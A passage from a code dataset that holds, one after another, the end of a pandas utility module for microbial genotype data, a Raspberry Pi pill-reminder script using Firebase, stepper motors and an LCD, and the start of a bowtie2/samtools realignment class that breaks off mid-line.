df:\n :return pd.DataFrame:\n \"\"\"\n df_result = df.copy(deep=True)\n for column in df_result.columns:\n try:\n schema = cn.TABLE_SCHEMAS.column_schemas.getSchema(column)\n if schema.data_type in [float, int, bool]:\n df_result[column] = pd.to_numeric(df_result[column])\n # Get an exception if the column type is unknown\n except ValueError:\n pass\n return df_result\n\ndef appendUnique(values, value):\n \"\"\"\n Adds value to values if it is not already present.\n :param list-of-object values:\n :param object value:\n :return list-of-object:\n \"\"\"\n new_values = list(values)\n if not value in new_values:\n new_values.append(value)\n return new_values\n\ndef mergeLeft(df1, df2, merge_column):\n \"\"\"\n Does a left join properly handling null values (which pandas does not do).\n :param pd.DataFrame df1: left dataframe\n :param pd.DataFrame df2:\n :param str merge_column: column on which the merge is done\n :return pd.DataFrame:\n Assumes that the only overlap in column names is the merge_column\n \"\"\"\n overlaps = set(df1.columns).intersection(df2.columns)\n if overlaps != set([merge_column]):\n raise ValueError (\"Must only have the merge column in common!\")\n # Find the null values on the left\n sel = [not x for x in df1[merge_column].isnull()]\n df_left = df1[sel]\n # Merge non-null values\n df_result = df_left.merge(df2, on=merge_column, how='left')\n # Include the omitted rows as null columns\n sel = [x for x in df1[merge_column].isnull()]\n df_null = df1[sel].copy()\n for column in df2.columns:\n if column != merge_column:\n df_null[column] = cn.NONE\n # Add the missing rows\n df_result = pd.concat([df_result, df_null], sort=True)\n # Finalize result\n cleanDF(df_result)\n return df_result\n\ndef unpivot(df, label_column='label', value_column='value'):\n \"\"\"\n Converts a pivoted dataframe into one with a column\n of labels.\n :param pd.DataFrame: DF with values in cells and value\n labels in columns\n :param str label_column: name of the label column on output\n :param str value_column: name of the value column on output\n :return pd.DataFrame: label_column, value_column\n \"\"\"\n return pd.melt(df, var_name=label_column, value_vars=df.columns,\n value_name=value_column)\n\ndef makeMatrix(df, \n row_name=cn.KEY_ISOLATE,\n column_name=cn.KEY_MUTATION, \n value_name=cn.COUNT,\n default_value=0.0,\n ):\n \"\"\"\n Creates a data matrix that consists of only a column of\n row names, a column of column name, and a column of values.\n :param pd.DataFrame df:\n :param str row_name: name of the column in df used for row values\n :param str column_name: name of column whose values are used\n as column names in the matrix\n :param str value_name: name of the column from which values\n are obtained.\n :param float default_value: used for missing values\n \"\"\"\n df_sub = df[[row_name, column_name, value_name]].copy()\n df_sub.drop_duplicates(inplace=True)\n sel = df_sub.apply(\n lambda r: (not isNull(r[column_name]))\n and (not isNull(r[row_name])),\n axis=1\n )\n df_sub = df_sub.loc[sel]\n df_result = df_sub.pivot_table(index=row_name, columns=column_name, values=value_name)\n df_result = df_result.applymap(lambda x: 0 if isNull(x) else x)\n return df_result\n\ndef set2list(aSet):\n return [x for x in aSet]\n\ndef removeDuplicatesFromList(values):\n \"\"\"\n Trims the list to remove duplicates. List elements\n may be a string or a list of strings or int.\n Order is not preserved.\n :param list-of-str or list-of-list-of-other values:\n :return list-of-inputtype:\n \"\"\"\n if isStr(values[0]) or isNumber(values[0]):\n new_values = set(values)\n return set2list(new_values)\n else:\n df = pd.DataFrame(values)\n df = df.drop_duplicates()\n results = []\n for _,row in df.iterrows():\n results.append([v for v in row.to_dict().values()])\n return results\n\ndef getParentClass(cls):\n return cls.__bases__[0]\n\ndef normalizedMean(values, max_std):\n \"\"\"\n Computes the mean of values adjusted by their standard deviation.\n :param list-of-number values:\n :param float max_std:\n :return float:\n \"\"\"\n trimmed_values = trimExtremeValues(values, max_std)\n std = np.std(trimmed_values)\n if np.isclose(std, 0):\n return 0.0\n return np.mean([v/std for v in trimmed_values])\n\ndef trimExtremeValues(values, max_std):\n \"\"\"\n Returns a list that has values no large than max_std.\n :param list-of-number values:\n :param float max_std:\n :return list-of-number:\n \"\"\"\n std = np.std(values)\n if np.isclose(std, 0):\n return values\n normalized_values = [v/std for v in values]\n pairs = zip(values, normalized_values)\n return [v for v,z in pairs if abs(z) <= max_std]\n\ndef selectRows(df, constraints):\n \"\"\"\n Finds a subset of the original DataFrame.\n :param pd.DataFrame df:\n :param list-of-BooleanFunction constraints: \n A boolean function of a row of df_culture_isolate_mutation.\n :return pd.DataFrame:\n \"\"\"\n constraints = setNoneList(constraints)\n def checkConstraint(row):\n is_included = True\n for func in constraints:\n if not func(row):\n is_included = False\n break\n return is_included\n #\n sel = df.apply(checkConstraint, axis=1)\n df_result = df.loc[sel].copy(deep=True)\n df_result.drop_duplicates(inplace=True)\n return df_result\n\ndef isColinear(df_X):\n \"\"\"\n Determines if there is a colinearity in the X matrix.\n :param pd.DataFrame df_X: X matrix in linear regression\n :return bool:\n \"\"\"\n pseudo_inverse = np.dot(df_X.transpose(), df_X)\n det = np.linalg.det(pseudo_inverse)\n is_colinear = np.abs(det) < SMALL_DETERMINANT\n return is_colinear\n\ndef findRowColumn(df, predicate):\n \"\"\"\n Returns index, column tuples whose value satisfies a predicate.\n :param pd.DataFrame df:\n :param UnaryBooleanFunction predicate:\n :return list-of-tuple:\n \"\"\"\n result = []\n for index in df.index:\n for column in df.columns:\n if predicate(df.loc[index, column]):\n result.append((index, column))\n return result\n\ndef aggregateColumns(df, columns, aggregateFunc, sep=\"--\"):\n \"\"\"\n Creates a new column that that is an aggregation of existing columns.\n The old column is deleted. The new column is named\n as the concatenation of old columns separated by the separator.\n :param pd.DataFrame df:\n :param list-str columns:\n :param Function aggregateFunc: arg is dataframe; returns Series\n :return str: name of the new column\n \"\"\"\n df_sub = df[list(columns)]\n merged = aggregateFunc(df_sub)\n for col in columns:\n del df[col]\n str_columns = [str(c) for c in columns]\n new_column = sep.join(str_columns)\n df[new_column] = merged\n return new_column\n\ndef findCorrelatedColumns(df, min_corr=0.99):\n \"\"\"\n Forms groups of columns based on their correlations.\n :param pd.DataFrame df: Dataframe whose columns are analyzed\n :param float min_corr: minimum correlation for two mutations to be equivalent\n :return list-list-columns: List of columns that are correlated.\n \"\"\"\n df_corr = df.corr()\n relation = lambda m1, m2: df_corr.loc[m1, m2] >= min_corr\n equiv = EquivalenceClass(df, relation)\n equiv.do()\n equiv.validate() # Verify that the relations hold for groups\n classes = [c for c in equiv.classes if len(c) > 1]\n return classes\n\ndef isIterable(values):\n return \"__iter__\" in dir(values)\n\ndef selectColumns(df, constraint):\n \"\"\"\n Selects a subset of the columns in a dataframe.\n :param pd.DataFrame df:\n :param BooleanFunction constraint: Boolean Function of column name\n :return pd.DataFrame:\n \"\"\"\n columns = [c for c in df.columns if constraint(c)]\n return df[columns].copy()\n\ndef correlateWithPredictors(df_X, df_y):\n \"\"\"\n Constructs the correlation of each predictor with a dependent\n variable.\n :param pd.DataFrame df_X: columns of predictor variables\n :param pd.DataFrame df_y: dependent variable\n :return pd.DataFrame: cn.VALUE, indexed by df_column, ordered\n by descending absolute value of correlation\n \"\"\"\n df = df_X.copy()\n df[cn.DEPVAR] = df_y.iloc[:,0]\n df_corr = df.corr()\n df_corr = df_corr.applymap(lambda v: abs(v))\n df_result = pd.DataFrame(df_corr[cn.DEPVAR])\n df_result = df_result.drop([cn.DEPVAR])\n df_result = df_result.sort_values(cn.DEPVAR, ascending=False)\n return df_result\n\ndef appendWithColumnUnion(df1, df2, fill_value=0.0):\n \"\"\"\n Appends the two dataframes, adding columns if needed.\n :param pd.DataFrame df1:\n :param pd.DataFrame df2:\n :param float default_value: fill value used for added columns\n \"\"\"\n def addColumns(df, columns):\n for col in columns:\n df[col] = fill_value\n #\n columns1 = set(df1.columns)\n columns2 = set(df2.columns)\n add_columns1 = columns2.difference(columns1)\n add_columns2 = columns1.difference(columns2)\n #\n df1_new = df1.copy()\n df2_new = df2.copy()\n #\n addColumns(df1_new, add_columns1)\n addColumns(df2_new, add_columns2)\n df_result = df1_new.append(df2_new)\n #\n df_result.index = range(len(df_result))\n return df_result\n\ndef makeProjectedPredictor(df_X, df_x):\n \"\"\"\n Computes the residuals of df_x regressed on df_X and\n returns a matrix that augments df_X with these residuals.\n :param pd.DataFrame df_X:\n :param pd.DataFrame df_x:\n :return pd.DataFrame:\n \"\"\"\n MIN_SCORE = 0.05 # Minim score to use the residuals\n model = linear_model.LinearRegression(fit_intercept=False, \n copy_X=True)\n if isinstance(df_x, pd.Series):\n df_x = pd.DataFrame(df_x)\n name = df_x.columns[0]\n if isColinear(df_X):\n df_res = df_x\n else:\n model.fit(df_X, df_x)\n df_res = pd.DataFrame({\n name: [v[0] for v in model.predict(df_X)],\n })\n score = model.score(df_X, df_x)\n if score < MIN_SCORE:\n df_res = df_x\n else:\n df_res = pd.DataFrame(df_x[name] - df_res[name])\n df_res = df_res.applymap(lambda v: 0.0 if np.isnan(v) else v)\n df_result = df_X.copy()\n df_result[name] = df_res[name]\n return df_result\n\ndef makeProjectedPredictors(df_X):\n \"\"\"\n Computes the residuals of the regression of successive columns\n on preceeding columns.\n :param pd.DataFrame df_X:\n :return pd.DataFrame:\n \"\"\"\n columns = df_X.columns.tolist()\n df_result = pd.DataFrame(df_X[columns[0]])\n columns = columns[1:]\n for col in columns:\n df = makeProjectedPredictor(df_result, df_X[col])\n df_result[col] = df[col]\n return df_result\n\ndef extendBin(bnum, length):\n \"\"\"\n :param str bnum: binary number or integer\n :param int length:\n :return list-str: binary number with leading zeros\n \"\"\"\n if not isinstance(bnum, str):\n bnum = bin(bnum)\n result = list(bnum)[2:]\n while len(result) < length:\n result.insert(0, '0')\n return result\n\ndef addBinColumn(df):\n \"\"\"\n For a dataframe with columns that are binary values,\n adds a column that is the binary number for that column.\n On return, df has a column cn.VALUE that is the decimal\n number for the binary value.\n :param pd.DataFrame df:\n \"\"\"\n binaries = []\n columns = df.columns\n dff = df.copy()\n for col in dff.columns:\n dff = dff.rename(columns={col: str(col)})\n for _, row in dff.iterrows():\n binary = '0b'\n for col in dff.columns:\n binary = binary + str(int(row[col]))\n binaries.append(int(binary, 2))\n df[cn.VALUE] = binaries\n\ndef getFirstColumn(df):\n \"\"\"\n :param pd.DataFrame df:\n :return list-object: first column of df\n \"\"\"\n return df[df.columns[0]].tolist()\n\ndef nCr(n, r):\n \"\"\"\n Number of combinations of a set of size n of distinct objects\n choosing r objects.\n :param int n:\n :param int r:\n :return int:\n \"\"\"\n result = math.factorial(n) \\\n / math.factorial(n-r) / math.factorial(r)\n return result\n\ndef findKey(df, required_columns=None, max_size=4):\n \"\"\"\n Finds a key for the dataframe.\n :param pd.DataFrame df:\n :param list-str required_columns: Columns to include in the key\n \"\"\"\n length = len(df.drop_duplicates())\n required_columns = setNoneList(required_columns)\n columns = df.columns.tolist()\n for col in required_columns:\n columns.remove(col)\n combinator = combination_iterator.CombinationIterator(columns,\n max_size)\n keys = []\n for new_columns in combinator:\n new_columns.extend(required_columns)\n if len(df[new_columns].drop_duplicates()) == length:\n keys = new_columns\n break\n return keys\n \ndef makeGeneDescriptionDF(ggene_ids):\n \"\"\"\n Creates a dataframe of descriptions.\n :param list-of-str ggene_ids: values in cn.GGENE_ID\n :return pd.DataFrame: cn.GGENE_ID, GENE_DESC\n \"\"\"\n quoted_list = str([\"%s\" % str(g) for g in ggene_ids])\n in_list = quoted_list.replace(\"[\", \"\")\n in_list = in_list.replace(\"]\", \"\")\n query = '''\n select distinct gene_id, ggene_id, gene_desc\n from genotype \n where gene_id = ggene_id and ggene_id in (%s)\n ''' % in_list\n df = readSQL(query)\n return df\n\ndef getIsolatesFromIndices(indices):\n \"\"\"\n Extracts the isolates from the indices of a df_X.\n :param pandas.index indices: \n cn.KEY_ISOLATE_DVH, cn.KEY_ISOLATE_MMP\n :return dict: keyed by cn.KEY_ISOLATE_DVH, cn.KEY_ISOLATE_MMP\n values correspond to rows element in the index\n \"\"\"\n keys = [n for n in indices.names]\n result = {}\n for idx, key in enumerate(keys):\n result[key] = [v[idx] for v in indices.values]\n return result\n\ndef makeDataframeFromXlsx(path, sheet_no=0):\n \"\"\"\n Creates a dataframe from an xlsx file in a data directory\n :param str path: Path to data files\n :param int sheet_no: Number of the worksheet\n \"\"\"\n data = pd.ExcelFile(path)\n return data.parse(sheet_no)\n\ndef getRootDataDirectory():\n return getPath([getIdentifiedDirectory(), DATA_DIR], None)\n\ndef getIdentifiedDirectory(key_directory=None):\n \"\"\"\n Finds the directory that contains the specified directory.\n :return str: path to top folder of enclosed project\n \"\"\"\n if key_directory is None:\n directories = DATA_DIRECTORIES\n else:\n directories = set([key_directory])\n curdir = os.getcwd()\n paths = []\n while len(curdir) > 1:\n paths.append(curdir)\n curdir = os.path.split(curdir)[0]\n paths.reverse()\n for path in paths:\n if len(directories.intersection(os.listdir(path))) > 0:\n return path\n raise ValueError(\"%s not found.\" % key_directory)\n\ndef makeNormalizedData(df_denormalized):\n \"\"\"\n Creates a set of normalized dataframes that correspond to\n the denomralized data for genotype_phenotype data.\n :param pd.DataFrame df_denormalized: \n See constants.TABLE_GENOTYPE_PHENOTYPE\n :return NormalizedData:\n \"\"\"\n normalized_data = NormalizedData()\n for table_name in TABLES_GENOTYPE_PHENOTYPE:\n schema = cn.TABLE_SCHEMAS.getSchema(table_name)\n df = df_denormalized[schema.columns].copy()\n normalized_data[schema.name] = df.drop_duplicates()\n return normalized_data\n\ndef makeDenormalizedDF(normalized_data):\n \"\"\"\n Creates a denormalized dataframe by joining the normalized tables.\n :param NormalizedData normalized_data:\n :return pd.DataFrame: has schema of TABLE_CULTURE_ISOLATE_MUTATION\n \"\"\"\n def mergeDF(table1, table2, table_link, columns):\n df1 = normalized_data[table1].merge(normalized_data[table_link],\n on=columns[0], how='inner')\n df2 = df1.merge(normalized_data[table2],\n on=columns[1], how='inner')\n df = df2.drop_duplicates()\n return df\n #\n df_im = mergeDF(cn.TABLE_MUTATION, cn.TABLE_ISOLATE,\n cn.TABLE_ISOLATE_MUTATION_LINK,\n [cn.KEY_MUTATION, cn.KEY_ISOLATE])\n df_ci = normalized_data[cn.TABLE_CULTURE].merge(\n normalized_data[cn.TABLE_CULTURE_ISOLATE_LINK], \n on=cn.KEY_CULTURE, how=\"inner\")\n df = df_im.merge(df_ci, on=cn.KEY_ISOLATE, how=\"inner\")\n df = df.merge(normalized_data[cn.TABLE_GENE_DESCRIPTION], \n on=cn.GENE_ID, how=\"inner\")\n return df\n \n\n\n################# CLASSES ####################\nclass NormalizedData(dict):\n \"\"\"\n Container of tables for Noramlized Data.\n Has keys for TABLE_PHENOTYPE_GENOTYPE\n \"\"\"\n pass\n","repo_name":"ScienceStacks/microbepy","sub_path":"microbepy/common/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":33902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"9790692082","text":"#Pill Reminder, Capstone 2\n#Jeffrey R. Cruz Rodriguez = S00914944\n#Darel Diaz Ramos = S01045655\n\nimport RPi.GPIO as GPIO\nimport time\nfrom time import sleep\nfrom Adafruit_CharLCD import Adafruit_CharLCD\nfrom firebase import firebase\nimport schedule \n\nGPIO.setmode(GPIO.BCM)\n\nfirebase = firebase.FirebaseApplication('https://pillreminder2-c8807.firebaseio.com/',None)\n\n\nlcd = Adafruit_CharLCD(rs=26,en=19,\n\t\td4=13, d5=6,d6=5,d7=11,\n\t\tcols=16,lines=2)\nlcd.clear()\n\n\nControlPin = [4,17,21,22]\n\nControlPin2 = [22,21,17,4]\n\n\n\nControlPin3 = [12,16,20,21]\n\nControlPin4 = [21,20,16,12]\n\n\n\nControlPin5 = [18,24,25,8]\n\nControlPin6 = [8,25,24,18]\n\n\n\nphotores = 23\n\nphotores2 = 10\n\nphotores3 = 9\n\nbuzzer = 3\n\nGPIO.setup(buzzer,GPIO.OUT)\n\nGPIO.output(buzzer,GPIO.LOW)\n\n\nplease = firebase.get('/Current Schedule/Darel Diaz/Hours1',None)\n\npilltime2= int(please)\n\nplease2 = firebase.get('/Current Schedule/Darel Diaz/Hours2',None)\n\npilltime3= int(please2)\n\nplease3 = firebase.get('/Current Schedule/Darel Diaz/Hours3',None)\n\npilltime4= int(please3)\n\ndef buzzer_beep():\n\tGPIO.output(buzzer,GPIO.HIGH)\n\tsleep(2)\n\tGPIO.output(buzzer,GPIO.LOW)\n\tsleep(2)\ndef buzzer_off():\n\tGPIO.output(buzzer,GPIO.LOW)\n\ndef quantity():\n\tquant = firebase.get('/Current Schedule/Darel Diaz/Qty1', None)\n\tquantity = int(quant)\n\n\treturn quantity\n\ndef quantity2():\n\tquant2 = firebase.get('/Current Schedule/Darel Diaz/Qty2', None)\n\tquantity2 = int(quant2)\n\n\treturn quantity2\n\ndef quantity3():\n\tquant3 = firebase.get('/Current Schedule/Darel Diaz/Qty3', None)\n\tquantity3 = int(quant3)\n\n\treturn quantity3\n\ndef Update_Capstone():\n\n\tpillhour = firebase.get('/Current Schedule/Darel Diaz/Hours1',None)\n\n\tpilltime = int(pillhour)\n\n\treturn pilltime\n\ndef Update_Capstone2():\n\n\tpillhour2 = firebase.get('/Current Schedule/Darel Diaz/Hours2',None)\n\n\tpilltime22 = int(pillhour2)\n\n\treturn pilltime22\n\ndef Update_Capstone3():\n\n\tpillhour3 = firebase.get('/Current Schedule/Darel Diaz/Hours3',None)\n\n\tpilltime33 = int(pillhour3)\n\n\treturn pilltime33\n\n\ndef rc_time(photores):\n\tcount=0\n\tGPIO.setup(photores,GPIO.OUT)\n\tGPIO.output(photores,GPIO.LOW)\n\ttime.sleep(0.1)\n\n\tGPIO.setup(photores,GPIO.IN)\n\n\twhile (GPIO.input(photores) == GPIO.LOW):\n\t\tcount += 1\n\treturn count\n\ndef rc_time2(photores2):\n\tcount=0\n\tGPIO.setup(photores2,GPIO.OUT)\n\tGPIO.output(photores2,GPIO.LOW)\n\ttime.sleep(0.1)\n\n\tGPIO.setup(photores2,GPIO.IN)\n\n\twhile (GPIO.input(photores2) == GPIO.LOW):\n\t\tcount += 1\n\treturn count\n\ndef rc_time3(photores3):\n\tcount=0\n\tGPIO.setup(photores3,GPIO.OUT)\n\tGPIO.output(photores3,GPIO.LOW)\n\ttime.sleep(0.1)\n\n\tGPIO.setup(photores3,GPIO.IN)\n\n\twhile (GPIO.input(photores3) == GPIO.LOW):\n\t\tcount += 1\n\treturn count\n\ndef motor1_up():\n\tfor pin in ControlPin:\n\t\tGPIO.setup(pin,GPIO.OUT)\n\t\tGPIO.output(pin,0)\n\n\tseq= [ [1,0,0,0],\n\t [1,1,0,0],\n\t [0,1,0,0],\n\t [0,1,1,0],\n\t [0,0,1,0],\n\t [0,0,1,1],\n\t [0,0,0,1],\n\t [1,0,0,1] ]\n\n\tfor i in range (512):\n\t\tfor halfstep in range(8):\n\t\t\tfor pin in range(4):\n\t\t\t\tGPIO.output(ControlPin[pin], seq[halfstep][pin])\n\n\t\t\ttime.sleep(0.001)\n\t\n\ndef moror1_down():\n\n\tfor pin2 in ControlPin2:\n\t\t\tGPIO.setup(pin2,GPIO.OUT)\n\t\t\tGPIO.output(pin2,0)\n\n\tseq2 = [ [1,0,0,0],\n\t\t\t [1,1,0,0],\n\t \t \t [0,1,0,0],\n\t \t \t [0,1,1,0],\n\t \t \t [0,0,1,0],\n\t \t \t [0,0,1,1],\n\t \t \t [0,0,0,1],\n\t \t \t [1,0,0,1] ]\n\n\tfor i in range (512):\n\t\tfor halfstep in range(8):\n\t\t\tfor pin2 in range(4):\n\t\t\t\tGPIO.output(ControlPin2[pin2], seq2[halfstep][pin2])\n\t\t\ttime.sleep(0.001)\n\n\n\ndef motor2_up():\n\tfor pin3 in ControlPin3:\n\t\tGPIO.setup(pin3,GPIO.OUT)\n\t\tGPIO.output(pin3,0)\n\n\tseq3= [ [1,0,0,0],\n\t [1,1,0,0],\n\t [0,1,0,0],\n\t [0,1,1,0],\n\t [0,0,1,0],\n\t [0,0,1,1],\n\t [0,0,0,1],\n\t [1,0,0,1] ]\n\n\tfor i in range (512):\n\t\tfor halfstep in range(8):\n\t\t\tfor pin3 in range(4):\n\t\t\t\tGPIO.output(ControlPin3[pin3], seq3[halfstep][pin3])\n\n\t\t\ttime.sleep(0.001)\n\t\n\ndef moror2_down():\n\n\tfor pin4 in ControlPin4:\n\t\t\tGPIO.setup(pin4,GPIO.OUT)\n\t\t\tGPIO.output(pin4,0)\n\n\tseq4 = [ [1,0,0,0],\n\t\t\t [1,1,0,0],\n\t \t \t [0,1,0,0],\n\t \t \t [0,1,1,0],\n\t \t \t [0,0,1,0],\n\t \t \t [0,0,1,1],\n\t \t \t [0,0,0,1],\n\t \t \t [1,0,0,1] ]\n\n\tfor i in range (512):\n\t\tfor halfstep in range(8):\n\t\t\tfor pin4 in range(4):\n\t\t\t\tGPIO.output(ControlPin4[pin4], seq4[halfstep][pin4])\n\t\t\ttime.sleep(0.001)\n\n\n\ndef motor3_up():\n\tfor pin5 in ControlPin5:\n\t\tGPIO.setup(pin5,GPIO.OUT)\n\t\tGPIO.output(pin5,0)\n\n\tseq5= [ [1,0,0,0],\n\t [1,1,0,0],\n\t [0,1,0,0],\n\t [0,1,1,0],\n\t [0,0,1,0],\n\t [0,0,1,1],\n\t [0,0,0,1],\n\t [1,0,0,1] ]\n\n\tfor i in range (512):\n\t\tfor halfstep in range(8):\n\t\t\tfor pin5 in range(4):\n\t\t\t\tGPIO.output(ControlPin5[pin5], seq5[halfstep][pin5])\n\n\t\t\ttime.sleep(0.001)\n\t\n\ndef moror3_down():\n\n\tfor pin6 in ControlPin6:\n\t\t\tGPIO.setup(pin6,GPIO.OUT)\n\t\t\tGPIO.output(pin6,0)\n\n\tseq6 = [ [1,0,0,0],\n\t\t\t [1,1,0,0],\n\t \t \t [0,1,0,0],\n\t \t \t [0,1,1,0],\n\t \t \t [0,0,1,0],\n\t \t \t [0,0,1,1],\n\t \t \t [0,0,0,1],\n\t \t \t [1,0,0,1] ]\n\n\tfor i in range (512):\n\t\tfor halfstep in range(8):\n\t\t\tfor pin6 in range(4):\n\t\t\t\tGPIO.output(ControlPin6[pin6], seq6[halfstep][pin6])\n\t\t\ttime.sleep(0.001)\n\n\t\t\n\ndef capstone():\n\n\t\n\tmoror1_down()\n\n\tmessage_motor1 = firebase.get('/Current Schedule/Darel Diaz/Name1',None)\n\tmessage2_motor1 = firebase.get('/Current Schedule/Darel Diaz/Dose1',None)\n\n\tDose = int(message2_motor1)\n\n#/////////////////////////////////1\n\t\n\n\tbuzzer_beep()\n\tlcd.message(\"Pill Name: \" + message_motor1 + \"\\n\" + \"Take: \" + message2_motor1 + \" pill\")\n\ttime.sleep(2)\n\tbuzzer_off()\n\n\tif rc_time(photores) > 30000:\n\t\ttime.sleep(5)\n\t\tlcd.clear()\n\t\tlcd.message('Times up')\n\t\t\n\n\t\t#//////////////////////////////////2\n\t\tmotor1_up()\n\n\t\tlcd.clear()\n\t\n\n\telse:\n\t\tnewqty = 0 \n\t\tqty = quantity()\n\t\tnewqty = qty - Dose\n\n\t\tstrqty = str(newqty)\n\n\t\tif newqty <= Dose:\n\t\t\tlcd.clear()\n\t\t\tlcd.message(\"Youre running out of pills \\n Head to the pharmacy\")\n\n\t\t\tlcd.clear()\n\t\telse:\n\t\t\tlcd.clear()\n\t\t\tnew = str(newqty)\n\t\t\tlcd.message(\"You have \" + new + \"pills\" + \"\\n\" + \"of\" + message_motor1)\n\n\t\t#datatest = {\"Qty1\": newqty}\n\t\tfirebase.put('/Current Schedule/Darel Diaz', \"Qty1\", strqty)\n\n\t\tmotor1_up()\n\n\t\tlcd.clear()\n\t\t#///////////////////////////2\n\n\t\t\n\ndef capstone2():\n\n\tmoror2_down()\n\n\tmessage_motor2 = firebase.get('/Current Schedule/Darel Diaz/Name2',None)\n\tmessage2_motor2 = firebase.get('/Current Schedule/Darel Diaz/Dose2',None)\n\n\tDose2 = int(message2_motor2)\n\n#/////////////////////////////////1\n\t\n\tbuzzer_beep()\n\tlcd.message(\"Pill Name: \" + message_motor2 + \"\\n\" + \"Take: \" + message2_motor2 + \" pill\")\n\ttime.sleep(2)\n\tbuzzer_off()\n\n\tif rc_time(photores2) > 30000:\n\t\ttime.sleep(5)\n\t\tlcd.clear()\n\t\tlcd.message('Times up')\n\t\t\n\n\t\t#//////////////////////////////////2\n\t\tmotor2_up()\n\n\t\tlcd.clear()\n\t\n\n\telse:\n\t\tnewqty2 = 0 \n\t\tqty2 = quantity2()\n\t\tnewqty2 = qty2 - Dose2\n\n\t\tstrqty2 = str(newqty2)\n\n\t\tif newqty2 <= Dose2:\n\t\t\tlcd.clear()\n\t\t\tlcd.message(\"Youre running out of pills \\n Head to the pharmacy\")\n\n\t\t\tlcd.clear()\n\t\telse:\n\t\t\tlcd.clear()\n\t\t\tnew2 = str(newqty2)\n\t\t\tlcd.message(\"You have \" + new2 + \"pills\" + \"\\n\" + \"of\" + message_motor2)\n\n\t\t#datatest2 = {\"Qty2\": newqty2}\n\t\tfirebase.put('/Current Schedule/Darel Diaz', \"Qty2\", strqty2)\n\n\t\tmotor2_up()\n\n\t\tlcd.clear()\n\t\t#///////////////////////////2\n\n\t\n\t\t\n\n\ndef capstone3():\n\n\tmoror3_down()\n\n\tmessage_motor3 = firebase.get('/Current Schedule/Darel Diaz/Name3',None)\n\tmessage2_motor3 = firebase.get('/Current Schedule/Darel Diaz/Dose3',None)\n\n\tDose3 = int(message2_motor3)\n\n#/////////////////////////////////1\n\t\n\t\n\n\tbuzzer_beep()\n\tlcd.message(\"Pill Name: \" + message_motor3 + \"\\n\" + \"Take: \" + message2_motor3 + \" pill\")\n\ttime.sleep(2)\n\tbuzzer_off()\n\n\tif rc_time(photores3) > 20000:\n\t\ttime.sleep(5)\n\t\tlcd.clear()\n\t\tlcd.message('Times up')\n\t\t\n\n\t\t#//////////////////////////////////2\n\t\tmotor3_up()\n\n\t\tlcd.clear()\n\t\n\n\telse:\n\t\tnewqty3 = 0 \n\t\tqty3 = quantity3()\n\t\tnewqty3 = qty3 - Dose3\n\n\t\tstrqty3 = str(newqty3)\n\n\t\tif newqty3 <= Dose3:\n\t\t\tlcd.clear()\n\t\t\tlcd.message(\"Youre running out of pills \\n Head to the pharmacy\")\n\n\t\t\tlcd.clear()\n\t\telse:\n\t\t\tlcd.clear()\n\t\t\tnew3 = str(newqty3)\n\t\t\tlcd.message(\"You have \" + new3 + \"pills\" + \"\\n\" + \"of\" + message_motor3)\n\n\t\t#datatest3 = {\"Qty3\": newqty3}\n\t\tfirebase.put('/Current Schedule/Darel Diaz', \"Qty3\", strqty3)\n\n\t\tmotor3_up()\n\n\t\tlcd.clear()\n\n\n\ndef conv(pleaseetime):\n\n\tnewtime = pleaseetime * 3600\n\n\treturn newtime\n\n\n\nwhile True:\n\n\t#time.sleep(conv(pilltime2))\n\ttime.sleep(pilltime2)\n\tcapstone()\n\n\ttime.sleep(pilltime3 - pilltime2)\n\tcapstone2()\n\n\tif(pilltime4 == pilltime2 == pilltime3):\n\t\tcapstone3()\n\n\telse:\n\t\ttime.sleep(pilltime4 - pilltime3)\n\t\tcapstone3()\n\n\tpilltime2 = Update_Capstone()\n\tpilltime3 = Update_Capstone2()\n\tpilltime4 = Update_Capstone3()\n","repo_name":"jeffcruz217/Capstone","sub_path":"CapstoneScript.py","file_name":"CapstoneScript.py","file_ext":"py","file_size_in_byte":8593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37161253599","text":"import os\nimport subprocess\n\n\nclass Realigner:\n def __init__(self, output_path, visualization_path):\n self.output_path = output_path\n self.visualization_path = visualization_path\n # TODO: Move all this to initialize.py\n if not os.path.exists(os.path.join(self.output_path, \"fasta_indexed\")):\n os.makedirs(os.path.join(self.output_path, \"fasta_indexed\"))\n if not os.path.exists(os.path.join(self.output_path, \"bam\")):\n os.makedirs(os.path.join(self.output_path, \"bam\"))\n if not os.path.exists(os.path.join(self.visualization_path, \"cram\")):\n os.makedirs(os.path.join(self.visualization_path, \"cram\"))\n if not os.path.exists(os.path.join(self.output_path, \"bam_sorted\")):\n os.makedirs(os.path.join(self.output_path, \"bam_sorted\"))\n if not os.path.exists(os.path.join(self.output_path, \"logs\")):\n os.makedirs(os.path.join(self.output_path, \"logs\"))\n\n self.al_out = open(\n os.path.join(self.output_path, \"logs\", \"alignment.output.log\"), \"w\"\n )\n self.al_err = open(\n os.path.join(self.output_path, \"logs\", \"alignment.error.log\"), \"w\"\n )\n\n def realign(self, fasta_file_path, fastq1_path, fastq2_path, file_name):\n cmd = [\"samtools\", \"faidx\", fasta_file_path]\n\n # Python 3.4\n subprocess.call(cmd, stdout=self.al_out, stderr=self.al_err)\n\n indexed_fa_path = os.path.join(\n self.output_path, \"fasta_indexed\", file_name + \".indexed.fasta\"\n )\n\n cmd = [\"bowtie2-build\", fasta_file_path, indexed_fa_path]\n\n # Python 3.4\n subprocess.call(cmd, stdout=self.al_out, stderr=self.al_err)\n\n sam_path = os.path.join(\n self.output_path, os.path.join(\"sam\", file_name + \".sam\")\n )\n\n cmd = [\n \"bowtie2\",\n \"-X\",\n \"1000\",\n \"--local\",\n \"--phred33\",\n \"--sensitive\",\n \"-p\",\n \" 6\",\n \"-x\",\n indexed_fa_path,\n \"-1\",\n fastq1_path,\n \"-2\",\n fastq2_path,\n \"-S\",\n sam_path,\n ]\n\n # Python 3.4\n subprocess.call(cmd, stdout=self.al_out, stderr=self.al_err)\n\n bam_path = os.path.join(\n self.output_path, os.path.join(\"bam\", file_name + \".bam\")\n )\n\n cmd = [\"samtools\", \"view\", \"-b\", \"-o\", bam_path, sam_path]\n\n # Python 3.4\n subprocess.call(cmd, stdout=self.al_out, stderr=self.al_err)\n # Python 3.5\n # p = subprocess.run(cmd, stdout=al_out, stderr=al_err)\n # p.check_returncode() # change this to log errors\n\n bam_sorted_path = os.path.join(\n self.output_path, os.path.join(\"bam_sorted\", file_name + \".sort.bam\"),\n )\n\n cmd = [\"samtools\", \"sort\", \"-o\", bam_sorted_path, 